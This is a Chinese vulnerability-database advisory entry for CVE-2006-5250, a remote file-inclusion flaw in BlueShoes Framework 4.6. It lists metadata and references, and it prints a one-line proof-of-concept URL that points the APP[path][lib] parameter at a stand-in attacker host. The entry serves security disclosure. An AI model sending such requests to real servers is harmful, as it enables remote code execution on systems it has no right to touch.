BlueShoes Framework 'lib/googlesearch/GoogleSearch.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111226 漏洞类型 输入验证
发布时间 2006-10-10 更新时间 2006-10-19
CVE编号 CVE-2006-5250 CNNVD-ID CNNVD-200610-173
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/28781
https://cxsecurity.com/issue/WLB-2006100074
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-173
|漏洞详情
BlueShoes4.6_public以及较早版本的lib/googlesearch/GoogleSearch.php中存在PHP远程文件包含漏洞,远程攻击者可通过APP[path][lib]参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20450/info

BlueShoes Framework is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects version 4.6; other versions may also be affected.

http://www.example.com/blueshoes-4.6_public/blueshoes-4.6/lib/googlesearch/GoogleSearch.php?APP[path][lib]=http://attacker's site
|参考资料

来源:XF
名称:blueshoes-google-file-include(29429)
链接:http://xforce.iss.net/xforce/xfdb/29429
来源:BID
名称:20450
链接:http://www.securityfocus.com/bid/20450
来源:BUGTRAQ
名称:20061010blueshoes<=4.6_publicRemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/448182/100/0/threaded
来源:MISC
链接:http://www.blueshoes.org/en/news/
来源:SREASON
名称:1713
链接:http://securityreason.com/securityalert/1713